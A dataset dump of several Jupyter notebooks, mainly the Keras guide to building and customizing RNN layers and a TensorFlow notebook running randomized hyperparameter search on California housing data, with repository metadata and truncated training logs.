a file in the file browswer at the left called \"BLASTe40_out\". This is simply a text file, but contains the information we want to visualize in the next Jupyter Notebook. <b>Let's download \"BLASTe40_out\" and \"final_40.fasta\" to our personal computers so we can use them later.<b> \n \n<font color=blue><b>STEP 22:</b></font> Download the file by clicking on the file \"BLASTe40_out\" and then go up to the Jupyter file menu and Download. Repeat for \"final_40.fasta\" Please note where you are downloading these files on your computer.\n\n<b>We will take a 10 min break here! I can answer questions during this time as well!</b>\n\nWhen we return, we will most likely need to either 1) restart the kernel or 2) relaunch the binder. Then we will open Jupyter Notebook \"3 - Visualizing_BLAST_data\" and upload our BLASTe40 file if needed.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
e73037f658f16668988d6d319e675fa9033fc9d3
29,572
ipynb
Jupyter Notebook
guides/ipynb/working_with_rnns.ipynb
miykael/keras-io
a3bb3dc49b8eb0ebbe8a5d91329f8378eacdd7d4
[ "Apache-2.0" ]
1
2020-12-01T03:41:00.000Z
2020-12-01T03:41:00.000Z
guides/ipynb/working_with_rnns.ipynb
miykael/keras-io
a3bb3dc49b8eb0ebbe8a5d91329f8378eacdd7d4
[ "Apache-2.0" ]
null
null
null
guides/ipynb/working_with_rnns.ipynb
miykael/keras-io
a3bb3dc49b8eb0ebbe8a5d91329f8378eacdd7d4
[ "Apache-2.0" ]
null
null
null
32.748616
112
0.593162
[ [ [ "# Working with RNNs\n\n**Authors:** Scott Zhu, Francois Chollet<br>\n**Date created:** 2019/07/08<br>\n**Last modified:** 2020/04/14<br>\n**Description:** Complete guide to using & customizing RNN layers.", "_____no_output_____" ], [ "## Introduction\n\nRecurrent neural networks (RNN) are a class of neural networks that is powerful for\nmodeling sequence data such as time series or natural language.\n\nSchematically, a RNN layer uses a `for` loop to iterate over the timesteps of a\nsequence, while maintaining an internal state that encodes information about the\ntimesteps it has seen so far.\n\nThe Keras RNN API is designed with a focus on:\n\n- **Ease of use**: the built-in `keras.layers.RNN`, `keras.layers.LSTM`,\n`keras.layers.GRU` layers enable you to quickly build recurrent models without\nhaving to make difficult configuration choices.\n\n- **Ease of customization**: You can also define your own RNN cell layer (the inner\npart of the `for` loop) with custom behavior, and use it with the generic\n`keras.layers.RNN` layer (the `for` loop itself). This allows you to quickly\nprototype different research ideas in a flexible way with minimal code.\n", "_____no_output_____" ], [ "## Setup", "_____no_output_____" ] ], [ [ "import numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n", "_____no_output_____" ] ], [ [ "## Built-in RNN layers: a simple example\n", "_____no_output_____" ], [ "There are three built-in RNN layers in Keras:\n\n1. `keras.layers.SimpleRNN`, a fully-connected RNN where the output from previous\ntimestep is to be fed to next timestep.\n\n2. `keras.layers.GRU`, first proposed in\n[Cho et al., 2014](https://arxiv.org/abs/1406.1078).\n\n3. `keras.layers.LSTM`, first proposed in\n[Hochreiter & Schmidhuber, 1997](https://www.bioinf.jku.at/publications/older/2604.pdf).\n\nIn early 2015, Keras had the first reusable open-source Python implementations of LSTM\nand GRU.\n\nHere is a simple example of a `Sequential` model that processes sequences of integers,\nembeds each integer into a 64-dimensional vector, then processes the sequence of\nvectors using a `LSTM` layer.", "_____no_output_____" ] ], [ [ "model = keras.Sequential()\n# Add an Embedding layer expecting input vocab of size 1000, and\n# output embedding dimension of size 64.\nmodel.add(layers.Embedding(input_dim=1000, output_dim=64))\n\n# Add a LSTM layer with 128 internal units.\nmodel.add(layers.LSTM(128))\n\n# Add a Dense layer with 10 units.\nmodel.add(layers.Dense(10))\n\nmodel.summary()\n", "_____no_output_____" ] ], [ [ "Built-in RNNs support a number of useful features:\n\n- Recurrent dropout, via the `dropout` and `recurrent_dropout` arguments\n- Ability to process an input sequence in reverse, via the `go_backwards` argument\n- Loop unrolling (which can lead to a large speedup when processing short sequences on\nCPU), via the `unroll` argument\n- ...and more.\n\nFor more information, see the\n[RNN API documentation](https://keras.io/api/layers/recurrent_layers/).", "_____no_output_____" ], [ "## Outputs and states\n\nBy default, the output of a RNN layer contain a single vector per sample. This vector\nis the RNN cell output corresponding to the last timestep, containing information\nabout the entire input sequence. The shape of this output is `(batch_size, units)`\nwhere `units` corresponds to the `units` argument passed to the layer's constructor.\n\nA RNN layer can also return the entire sequence of outputs for each sample (one vector\nper timestep per sample), if you set `return_sequences=True`. The shape of this output\nis `(batch_size, timesteps, units)`.", "_____no_output_____" ] ], [ [ "model = keras.Sequential()\nmodel.add(layers.Embedding(input_dim=1000, output_dim=64))\n\n# The output of GRU will be a 3D tensor of shape (batch_size, timesteps, 256)\nmodel.add(layers.GRU(256, return_sequences=True))\n\n# The output of SimpleRNN will be a 2D tensor of shape (batch_size, 128)\nmodel.add(layers.SimpleRNN(128))\n\nmodel.add(layers.Dense(10))\n\nmodel.summary()\n", "_____no_output_____" ] ], [ [ "In addition, a RNN layer can return its final internal state(s). The returned states\ncan be used to resume the RNN execution later, or\n[to initialize another RNN](https://arxiv.org/abs/1409.3215).\nThis setting is commonly used in the\nencoder-decoder sequence-to-sequence model, where the encoder final state is used as\nthe initial state of the decoder.\n\nTo configure a RNN layer to return its internal state, set the `return_state` parameter\nto `True` when creating the layer. Note that `LSTM` has 2 state tensors, but `GRU`\nonly has one.\n\nTo configure the initial state of the layer, just call the layer with additional\nkeyword argument `initial_state`.\nNote that the shape of the state needs to match the unit size of the layer, like in the\nexample below.", "_____no_output_____" ] ], [ [ "encoder_vocab = 1000\ndecoder_vocab = 2000\n\nencoder_input = layers.Input(shape=(None,))\nencoder_embedded = layers.Embedding(input_dim=encoder_vocab, output_dim=64)(\n encoder_input\n)\n\n# Return states in addition to output\noutput, state_h, state_c = layers.LSTM(64, return_state=True, name=\"encoder\")(\n encoder_embedded\n)\nencoder_state = [state_h, state_c]\n\ndecoder_input = layers.Input(shape=(None,))\ndecoder_embedded = layers.Embedding(input_dim=decoder_vocab, output_dim=64)(\n decoder_input\n)\n\n# Pass the 2 states to a new LSTM layer, as initial state\ndecoder_output = layers.LSTM(64, name=\"decoder\")(\n decoder_embedded, initial_state=encoder_state\n)\noutput = layers.Dense(10)(decoder_output)\n\nmodel = keras.Model([encoder_input, decoder_input], output)\nmodel.summary()\n", "_____no_output_____" ] ], [ [ "## RNN layers and RNN cells\n\nIn addition to the built-in RNN layers, the RNN API also provides cell-level APIs.\nUnlike RNN layers, which processes whole batches of input sequences, the RNN cell only\nprocesses a single timestep.\n\nThe cell is the inside of the `for` loop of a RNN layer. Wrapping a cell inside a\n`keras.layers.RNN` layer gives you a layer capable of processing batches of\nsequences, e.g. `RNN(LSTMCell(10))`.\n\nMathematically, `RNN(LSTMCell(10))` produces the same result as `LSTM(10)`. In fact,\nthe implementation of this layer in TF v1.x was just creating the corresponding RNN\ncell and wrapping it in a RNN layer. However using the built-in `GRU` and `LSTM`\nlayers enables the use of CuDNN and you may see better performance.\n\nThere are three built-in RNN cells, each of them corresponding to the matching RNN\nlayer.\n\n- `keras.layers.SimpleRNNCell` corresponds to the `SimpleRNN` layer.\n\n- `keras.layers.GRUCell` corresponds to the `GRU` layer.\n\n- `keras.layers.LSTMCell` corresponds to the `LSTM` layer.\n\nThe cell abstraction, together with the generic `keras.layers.RNN` class, make it\nvery easy to implement custom RNN architectures for your research.\n", "_____no_output_____" ], [ "## Cross-batch statefulness\n\nWhen processing very long sequences (possibly infinite), you may want to use the\npattern of **cross-batch statefulness**.\n\nNormally, the internal state of a RNN layer is reset every time it sees a new batch\n(i.e. every sample seen by the layer is assume to be independent from the past). The\nlayer will only maintain a state while processing a given sample.\n\nIf you have very long sequences though, it is useful to break them into shorter\nsequences, and to feed these shorter sequences sequentially into a RNN layer without\nresetting the layer's state. That way, the layer can retain information about the\nentirety of the sequence, even though it's only seeing one sub-sequence at a time.\n\nYou can do this by setting `stateful=True` in the constructor.\n\nIf you have a sequence `s = [t0, t1, ... t1546, t1547]`, you would split it into e.g.\n\n```\ns1 = [t0, t1, ... t100]\ns2 = [t101, ... t201]\n...\ns16 = [t1501, ... t1547]\n```\n\nThen you would process it via:\n\n```python\nlstm_layer = layers.LSTM(64, stateful=True)\nfor s in sub_sequences:\n output = lstm_layer(s)\n```\n\nWhen you want to clear the state, you can use `layer.reset_states()`.\n\n\n> Note: In this setup, sample `i` in a given batch is assumed to be the continuation of\nsample `i` in the previous batch. This means that all batches should contain the same\nnumber of samples (batch size). E.g. if a batch contains `[sequence_A_from_t0_to_t100,\n sequence_B_from_t0_to_t100]`, the next batch should contain\n`[sequence_A_from_t101_to_t200, sequence_B_from_t101_to_t200]`.\n\n\n\n\nHere is a complete example:\n", "_____no_output_____" ] ], [ [ "paragraph1 = np.random.random((20, 10, 50)).astype(np.float32)\nparagraph2 = np.random.random((20, 10, 50)).astype(np.float32)\nparagraph3 = np.random.random((20, 10, 50)).astype(np.float32)\n\nlstm_layer = layers.LSTM(64, stateful=True)\noutput = lstm_layer(paragraph1)\noutput = lstm_layer(paragraph2)\noutput = lstm_layer(paragraph3)\n\n# reset_states() will reset the cached state to the original initial_state.\n# If no initial_state was provided, zero-states will be used by default.\nlstm_layer.reset_states()\n\n", "_____no_output_____" ] ], [ [ "### RNN State Reuse\n<a id=\"rnn_state_reuse\"></a>", "_____no_output_____" ], [ "The recorded states of the RNN layer are not included in the `layer.weights()`. If you\nwould like to reuse the state from a RNN layer, you can retrieve the states value by\n`layer.states` and use it as the\ninitial state for a new layer via the Keras functional API like `new_layer(inputs,\ninitial_state=layer.states)`, or model subclassing.\n\nPlease also note that sequential model might not be used in this case since it only\nsupports layers with single input and output, the extra input of initial state makes\nit impossible to use here.\n", "_____no_output_____" ] ], [ [ "paragraph1 = np.random.random((20, 10, 50)).astype(np.float32)\nparagraph2 = np.random.random((20, 10, 50)).astype(np.float32)\nparagraph3 = np.random.random((20, 10, 50)).astype(np.float32)\n\nlstm_layer = layers.LSTM(64, stateful=True)\noutput = lstm_layer(paragraph1)\noutput = lstm_layer(paragraph2)\n\nexisting_state = lstm_layer.states\n\nnew_lstm_layer = layers.LSTM(64)\nnew_output = new_lstm_layer(paragraph3, initial_state=existing_state)\n\n", "_____no_output_____" ] ], [ [ "## Bidirectional RNNs\n\nFor sequences other than time series (e.g. text), it is often the case that a RNN model\ncan perform better if it not only processes sequence from start to end, but also\nbackwards. For example, to predict the next word in a sentence, it is often useful to\nhave the context around the word, not only just the words that come before it.\n\nKeras provides an easy API for you to build such bidirectional RNNs: the\n`keras.layers.Bidirectional` wrapper.", "_____no_output_____" ] ], [ [ "model = keras.Sequential()\n\nmodel.add(\n layers.Bidirectional(layers.LSTM(64, return_sequences=True), input_shape=(5, 10))\n)\nmodel.add(layers.Bidirectional(layers.LSTM(32)))\nmodel.add(layers.Dense(10))\n\nmodel.summary()\n", "_____no_output_____" ] ], [ [ "Under the hood, `Bidirectional` will copy the RNN layer passed in, and flip the\n`go_backwards` field of the newly copied layer, so that it will process the inputs in\nreverse order.\n\nThe output of the `Bidirectional` RNN will be, by default, the sum of the forward layer\noutput and the backward layer output. If you need a different merging behavior, e.g.\nconcatenation, change the `merge_mode` parameter in the `Bidirectional` wrapper\nconstructor. For more details about `Bidirectional`, please check\n[the API docs](https://keras.io/api/layers/recurrent_layers/Bidirectional/).", "_____no_output_____" ], [ "## Performance optimization and CuDNN kernels\n\nIn TensorFlow 2.0, the built-in LSTM and GRU layers have been updated to leverage CuDNN\nkernels by default when a GPU is available. With this change, the prior\n`keras.layers.CuDNNLSTM/CuDNNGRU` layers have been deprecated, and you can build your\nmodel without worrying about the hardware it will run on.\n\nSince the CuDNN kernel is built with certain assumptions, this means the layer **will\nnot be able to use the CuDNN kernel if you change the defaults of the built-in LSTM or\nGRU layers**. E.g.:\n\n- Changing the `activation` function from `tanh` to something else.\n- Changing the `recurrent_activation` function from `sigmoid` to something else.\n- Using `recurrent_dropout` > 0.\n- Setting `unroll` to True, which forces LSTM/GRU to decompose the inner\n`tf.while_loop` into an unrolled `for` loop.\n- Setting `use_bias` to False.\n- Using masking when the input data is not strictly right padded (if the mask\ncorresponds to strictly right padded data, CuDNN can still be used. This is the most\ncommon case).\n\nFor the detailed list of constraints, please see the documentation for the\n[LSTM](https://keras.io/api/layers/recurrent_layers/LSTM/) and\n[GRU](https://keras.io/api/layers/recurrent_layers/GRU/) layers.", "_____no_output_____" ], [ "### Using CuDNN kernels when available\n\nLet's build a simple LSTM model to demonstrate the performance difference.\n\nWe'll use as input sequences the sequence of rows of MNIST digits (treating each row of\npixels as a timestep), and we'll predict the digit's label.\n", "_____no_output_____" ] ], [ [ "batch_size = 64\n# Each MNIST image batch is a tensor of shape (batch_size, 28, 28).\n# Each input sequence will be of size (28, 28) (height is treated like time).\ninput_dim = 28\n\nunits = 64\noutput_size = 10 # labels are from 0 to 9\n\n# Build the RNN model\ndef build_model(allow_cudnn_kernel=True):\n # CuDNN is only available at the layer level, and not at the cell level.\n # This means `LSTM(units)` will use the CuDNN kernel,\n # while RNN(LSTMCell(units)) will run on non-CuDNN kernel.\n if allow_cudnn_kernel:\n # The LSTM layer with default options uses CuDNN.\n lstm_layer = keras.layers.LSTM(units, input_shape=(None, input_dim))\n else:\n # Wrapping a LSTMCell in a RNN layer will not use CuDNN.\n lstm_layer = keras.layers.RNN(\n keras.layers.LSTMCell(units), input_shape=(None, input_dim)\n )\n model = keras.models.Sequential(\n [\n lstm_layer,\n keras.layers.BatchNormalization(),\n keras.layers.Dense(output_size),\n ]\n )\n return model\n\n", "_____no_output_____" ] ], [ [ "Let's load the MNIST dataset:", "_____no_output_____" ] ], [ [ "mnist = keras.datasets.mnist\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nx_train, x_test = x_train / 255.0, x_test / 255.0\nsample, sample_label = x_train[0], y_train[0]\n", "_____no_output_____" ] ], [ [ "Let's create a model instance and train it.\n\nWe choose `sparse_categorical_crossentropy` as the loss function for the model. The\noutput of the model has shape of `[batch_size, 10]`. The target for the model is a\ninteger vector, each of the integer is in the range of 0 to 9.", "_____no_output_____" ] ], [ [ "model = build_model(allow_cudnn_kernel=True)\n\nmodel.compile(\n loss=keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n optimizer=\"sgd\",\n metrics=[\"accuracy\"],\n)\n\n\nmodel.fit(\n x_train, y_train, validation_data=(x_test, y_test), batch_size=batch_size, epochs=1\n)\n", "_____no_output_____" ] ], [ [ "Now, let's compare to a model that does not use the CuDNN kernel:", "_____no_output_____" ] ], [ [ "noncudnn_model = build_model(allow_cudnn_kernel=False)\nnoncudnn_model.set_weights(model.get_weights())\nnoncudnn_model.compile(\n loss=keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n optimizer=\"sgd\",\n metrics=[\"accuracy\"],\n)\nnoncudnn_model.fit(\n x_train, y_train, validation_data=(x_test, y_test), batch_size=batch_size, epochs=1\n)\n", "_____no_output_____" ] ], [ [ "When running on a machine with a NVIDIA GPU and CuDNN installed,\nthe model built with CuDNN is much faster to train compared to the\nmodel that use the regular TensorFlow kernel.\n\nThe same CuDNN-enabled model can also be use to run inference in a CPU-only\nenvironment. The `tf.device` annotation below is just forcing the device placement.\nThe model will run on CPU by default if no GPU is available.\n\nYou simply don't have to worry about the hardware you're running on anymore. Isn't that\npretty cool?", "_____no_output_____" ] ], [ [ "import matplotlib.pyplot as plt\n\nwith tf.device(\"CPU:0\"):\n cpu_model = build_model(allow_cudnn_kernel=True)\n cpu_model.set_weights(model.get_weights())\n result = tf.argmax(cpu_model.predict_on_batch(tf.expand_dims(sample, 0)), axis=1)\n print(\n \"Predicted result is: %s, target result is: %s\" % (result.numpy(), sample_label)\n )\n plt.imshow(sample, cmap=plt.get_cmap(\"gray\"))\n", "_____no_output_____" ] ], [ [ "## RNNs with list/dict inputs, or nested inputs\n\nNested structures allow implementers to include more information within a single\ntimestep. For example, a video frame could have audio and video input at the same\ntime. The data shape in this case could be:\n\n`[batch, timestep, {\"video\": [height, width, channel], \"audio\": [frequency]}]`\n\nIn another example, handwriting data could have both coordinates x and y for the\ncurrent position of the pen, as well as pressure information. So the data\nrepresentation could be:\n\n`[batch, timestep, {\"location\": [x, y], \"pressure\": [force]}]`\n\nThe following code provides an example of how to build a custom RNN cell that accepts\nsuch structured inputs.\n", "_____no_output_____" ], [ "### Define a custom cell that support nested input/output", "_____no_output_____" ], [ "See [Making new Layers & Models via subclassing](/guides/making_new_layers_and_models_via_subclassing/)\nfor details on writing your own layers.", "_____no_output_____" ] ], [ [ "\nclass NestedCell(keras.layers.Layer):\n def __init__(self, unit_1, unit_2, unit_3, **kwargs):\n self.unit_1 = unit_1\n self.unit_2 = unit_2\n self.unit_3 = unit_3\n self.state_size = [tf.TensorShape([unit_1]), tf.TensorShape([unit_2, unit_3])]\n self.output_size = [tf.TensorShape([unit_1]), tf.TensorShape([unit_2, unit_3])]\n super(NestedCell, self).__init__(**kwargs)\n\n def build(self, input_shapes):\n # expect input_shape to contain 2 items, [(batch, i1), (batch, i2, i3)]\n i1 = input_shapes[0][1]\n i2 = input_shapes[1][1]\n i3 = input_shapes[1][2]\n\n self.kernel_1 = self.add_weight(\n shape=(i1, self.unit_1), initializer=\"uniform\", name=\"kernel_1\"\n )\n self.kernel_2_3 = self.add_weight(\n shape=(i2, i3, self.unit_2, self.unit_3),\n initializer=\"uniform\",\n name=\"kernel_2_3\",\n )\n\n def call(self, inputs, states):\n # inputs should be in [(batch, input_1), (batch, input_2, input_3)]\n # state should be in shape [(batch, unit_1), (batch, unit_2, unit_3)]\n input_1, input_2 = tf.nest.flatten(inputs)\n s1, s2 = states\n\n output_1 = tf.matmul(input_1, self.kernel_1)\n output_2_3 = tf.einsum(\"bij,ijkl->bkl\", input_2, self.kernel_2_3)\n state_1 = s1 + output_1\n state_2_3 = s2 + output_2_3\n\n output = (output_1, output_2_3)\n new_states = (state_1, state_2_3)\n\n return output, new_states\n\n def get_config(self):\n return {\"unit_1\": self.unit_1, \"unit_2\": unit_2, \"unit_3\": self.unit_3}\n\n", "_____no_output_____" ] ], [ [ "### Build a RNN model with nested input/output\n\nLet's build a Keras model that uses a `keras.layers.RNN` layer and the custom cell\nwe just defined.", "_____no_output_____" ] ], [ [ "unit_1 = 10\nunit_2 = 20\nunit_3 = 30\n\ni1 = 32\ni2 = 64\ni3 = 32\nbatch_size = 64\nnum_batches = 10\ntimestep = 50\n\ncell = NestedCell(unit_1, unit_2, unit_3)\nrnn = keras.layers.RNN(cell)\n\ninput_1 = keras.Input((None, i1))\ninput_2 = keras.Input((None, i2, i3))\n\noutputs = rnn((input_1, input_2))\n\nmodel = keras.models.Model([input_1, input_2], outputs)\n\nmodel.compile(optimizer=\"adam\", loss=\"mse\", metrics=[\"accuracy\"])\n", "_____no_output_____" ] ], [ [ "### Train the model with randomly generated data\n\nSince there isn't a good candidate dataset for this model, we use random Numpy data for\ndemonstration.", "_____no_output_____" ] ], [ [ "input_1_data = np.random.random((batch_size * num_batches, timestep, i1))\ninput_2_data = np.random.random((batch_size * num_batches, timestep, i2, i3))\ntarget_1_data = np.random.random((batch_size * num_batches, unit_1))\ntarget_2_data = np.random.random((batch_size * num_batches, unit_2, unit_3))\ninput_data = [input_1_data, input_2_data]\ntarget_data = [target_1_data, target_2_data]\n\nmodel.fit(input_data, target_data, batch_size=batch_size)\n", "_____no_output_____" ] ], [ [ "With the Keras `keras.layers.RNN` layer, You are only expected to define the math\nlogic for individual step within the sequence, and the `keras.layers.RNN` layer\nwill handle the sequence iteration for you. It's an incredibly powerful way to quickly\nprototype new kinds of RNNs (e.g. a LSTM variant).\n\nFor more details, please visit the [API docs](https://keras.io/api/layers/recurrent_layers/RNN/).", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
e7303dce1a30c7b1749062ecc49b4dcb4ca57c04
73,540
ipynb
Jupyter Notebook
notebook/3_PowerSimulations_examples/11_PTDF.ipynb
raphaelsaavedra/SIIPExamples.jl
d7304c84fe5382db2ff4c20f058bc1e5d01cae8c
[ "BSD-3-Clause" ]
null
null
null
notebook/3_PowerSimulations_examples/11_PTDF.ipynb
raphaelsaavedra/SIIPExamples.jl
d7304c84fe5382db2ff4c20f058bc1e5d01cae8c
[ "BSD-3-Clause" ]
null
null
null
notebook/3_PowerSimulations_examples/11_PTDF.ipynb
raphaelsaavedra/SIIPExamples.jl
d7304c84fe5382db2ff4c20f058bc1e5d01cae8c
[ "BSD-3-Clause" ]
null
null
null
69.181562
8,441
0.605018
[ [ [ "empty" ] ] ]
[ "empty" ]
[ [ "empty" ] ]
e7306e675c60fda3030284857602991a6e7ea722
218,203
ipynb
Jupyter Notebook
JupyterNotebookCode/tf_keras_regression-hp-search-sklearn.ipynb
DragonYong/Tensorflow
1f2b9fd81916515eb27f76827d31a61c31e03edb
[ "MIT" ]
null
null
null
JupyterNotebookCode/tf_keras_regression-hp-search-sklearn.ipynb
DragonYong/Tensorflow
1f2b9fd81916515eb27f76827d31a61c31e03edb
[ "MIT" ]
2
2020-06-01T04:32:46.000Z
2020-06-02T01:10:32.000Z
JupyterNotebookCode/tf_keras_regression-hp-search-sklearn.ipynb
DragonYong/Tensorflow
1f2b9fd81916515eb27f76827d31a61c31e03edb
[ "MIT" ]
null
null
null
65.803076
21,088
0.476213
[ [ [ "import matplotlib as mpl\nimport matplotlib.pyplot as plt\n%matplotlib inline\nimport numpy as np\nimport sklearn\nimport pandas as pd\nimport os\nimport sys\nimport time\nimport tensorflow as tf\n\nfrom tensorflow import keras\n\nprint(tf.__version__)\nprint(sys.version_info)\nfor module in mpl, np, pd, sklearn, tf, keras:\n print(module.__name__, module.__version__)", "2.0.0-alpha0\nsys.version_info(major=3, minor=7, micro=3, releaselevel='final', serial=0)\nmatplotlib 3.0.3\nnumpy 1.16.2\npandas 0.24.2\nsklearn 0.20.3\ntensorflow 2.0.0-alpha0\ntensorflow.python.keras.api._v2.keras 2.2.4-tf\n" ], [ "from sklearn.datasets import fetch_california_housing\n\nhousing = fetch_california_housing()\nprint(housing.DESCR)\nprint(housing.data.shape)\nprint(housing.target.shape)", ".. _california_housing_dataset:\n\nCalifornia Housing dataset\n--------------------------\n\n**Data Set Characteristics:**\n\n :Number of Instances: 20640\n\n :Number of Attributes: 8 numeric, predictive attributes and the target\n\n :Attribute Information:\n - MedInc median income in block\n - HouseAge median house age in block\n - AveRooms average number of rooms\n - AveBedrms average number of bedrooms\n - Population block population\n - AveOccup average house occupancy\n - Latitude house block latitude\n - Longitude house block longitude\n\n :Missing Attribute Values: None\n\nThis dataset was obtained from the StatLib repository.\nhttp://lib.stat.cmu.edu/datasets/\n\nThe target variable is the median house value for California districts.\n\nThis dataset was derived from the 1990 U.S. census, using one row per census\nblock group. A block group is the smallest geographical unit for which the U.S.\nCensus Bureau publishes sample data (a block group typically has a population\nof 600 to 3,000 people).\n\nIt can be downloaded/loaded using the\n:func:`sklearn.datasets.fetch_california_housing` function.\n\n.. topic:: References\n\n - Pace, R. Kelley and Ronald Barry, Sparse Spatial Autoregressions,\n Statistics and Probability Letters, 33 (1997) 291-297\n\n(20640, 8)\n(20640,)\n" ], [ "from sklearn.model_selection import train_test_split\n\nx_train_all, x_test, y_train_all, y_test = train_test_split(\n housing.data, housing.target, random_state = 7)\nx_train, x_valid, y_train, y_valid = train_test_split(\n x_train_all, y_train_all, random_state = 11)\nprint(x_train.shape, y_train.shape)\nprint(x_valid.shape, y_valid.shape)\nprint(x_test.shape, y_test.shape)\n", "(11610, 8) (11610,)\n(3870, 8) (3870,)\n(5160, 8) (5160,)\n" ], [ "from sklearn.preprocessing import StandardScaler\n\nscaler = StandardScaler()\nx_train_scaled = scaler.fit_transform(x_train)\nx_valid_scaled = scaler.transform(x_valid)\nx_test_scaled = scaler.transform(x_test)", "_____no_output_____" ], [ "# RandomizedSearchCV\n# 1. 转化为sklearn的model\n# 2. 定义参数集合\n# 3. 搜索参数\n\ndef build_model(hidden_layers = 1,\n layer_size = 30,\n learning_rate = 3e-3):\n model = keras.models.Sequential()\n model.add(keras.layers.Dense(layer_size, activation='relu',\n input_shape=x_train.shape[1:]))\n for _ in range(hidden_layers - 1):\n model.add(keras.layers.Dense(layer_size,\n activation = 'relu'))\n model.add(keras.layers.Dense(1))\n optimizer = keras.optimizers.SGD(learning_rate)\n model.compile(loss = 'mse', optimizer = optimizer)\n return model\n\nsklearn_model = KerasRegressor(\n build_fn = build_model)\ncallbacks = [keras.callbacks.EarlyStopping(patience=5, min_delta=1e-2)]\nhistory = sklearn_model.fit(x_train_scaled, y_train,\n epochs = 10,\n validation_data = (x_valid_scaled, y_valid),\n callbacks = callbacks)", "Train on 11610 samples, validate on 3870 samples\nEpoch 1/10\n11610/11610 [==============================] - 1s 83us/sample - loss: 1.4329 - val_loss: 0.7654\nEpoch 2/10\n11610/11610 [==============================] - 1s 49us/sample - loss: 0.6528 - val_loss: 0.6674\nEpoch 3/10\n11610/11610 [==============================] - 1s 53us/sample - loss: 0.6594 - val_loss: 0.7570\nEpoch 4/10\n11610/11610 [==============================] - 1s 50us/sample - loss: 1.1426 - val_loss: 0.7110\nEpoch 5/10\n11610/11610 [==============================] - 1s 49us/sample - loss: 0.5703 - val_loss: 0.5765\nEpoch 6/10\n11610/11610 [==============================] - 1s 50us/sample - loss: 0.5263 - val_loss: 0.5544\nEpoch 7/10\n11610/11610 [==============================] - 1s 52us/sample - loss: 0.5052 - val_loss: 0.5334\nEpoch 8/10\n11610/11610 [==============================] - 1s 65us/sample - loss: 0.4915 - val_loss: 0.5176\nEpoch 9/10\n11610/11610 [==============================] - 1s 59us/sample - loss: 0.4800 - val_loss: 0.5063\nEpoch 10/10\n11610/11610 [==============================] - 1s 75us/sample - loss: 0.4717 - val_loss: 0.4973\n" ], [ "def plot_learning_curves(history):\n pd.DataFrame(history.history).plot(figsize=(8, 5))\n plt.grid(True)\n plt.gca().set_ylim(0, 1)\n plt.show()\nplot_learning_curves(history)", "_____no_output_____" ], [ "from scipy.stats import reciprocal\n# f(x) = 1/(x*log(b/a)) a <= x <= b\n\nparam_distribution = {\n \"hidden_layers\":[1, 2, 3, 4],\n \"layer_size\": np.arange(1, 100),\n \"learning_rate\": reciprocal(1e-4, 1e-2),\n}\n\nfrom sklearn.model_selection import RandomizedSearchCV\n\nrandom_search_cv = RandomizedSearchCV(sklearn_model,\n param_distribution,\n n_iter = 10,\n cv = 3,\n n_jobs = 1)\nrandom_search_cv.fit(x_train_scaled, y_train, epochs = 100,\n validation_data = (x_valid_scaled, y_valid),\n callbacks = callbacks)\n\n# cross_validation: 训练集分成n份,n-1训练,最后一份验证.", "Train on 7740 samples, validate on 3870 samples\nEpoch 1/100\n7740/7740 [==============================] - 1s 91us/sample - loss: 3.0039 - val_loss: 2.2811\nEpoch 2/100\n7740/7740 [==============================] - 0s 62us/sample - loss: 1.5413 - val_loss: 1.4473\nEpoch 3/100\n7740/7740 [==============================] - 1s 70us/sample - loss: 1.0946 - val_loss: 1.1101\nEpoch 4/100\n7740/7740 [==============================] - 0s 55us/sample - loss: 0.9134 - val_loss: 0.9604\nEpoch 5/100\n7740/7740 [==============================] - 0s 56us/sample - loss: 0.8287 - val_loss: 0.8837\nEpoch 6/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.7808 - val_loss: 0.8373\nEpoch 7/100\n7740/7740 [==============================] - 0s 50us/sample - loss: 0.7491 - val_loss: 0.8040\nEpoch 8/100\n7740/7740 [==============================] - 0s 53us/sample - loss: 0.7265 - val_loss: 0.7803\nEpoch 9/100\n7740/7740 [==============================] - 0s 57us/sample - loss: 0.7079 - val_loss: 0.7587\nEpoch 10/100\n7740/7740 [==============================] - 0s 54us/sample - loss: 0.6931 - val_loss: 0.7422\nEpoch 11/100\n7740/7740 [==============================] - 0s 49us/sample - loss: 0.6799 - val_loss: 0.7269\nEpoch 12/100\n7740/7740 [==============================] - 1s 67us/sample - loss: 0.6680 - val_loss: 0.7132\nEpoch 13/100\n7740/7740 [==============================] - 0s 54us/sample - loss: 0.6579 - val_loss: 0.7014\nEpoch 14/100\n7740/7740 [==============================] - 0s 56us/sample - loss: 0.6484 - val_loss: 0.6910\nEpoch 15/100\n7740/7740 [==============================] - 1s 66us/sample - loss: 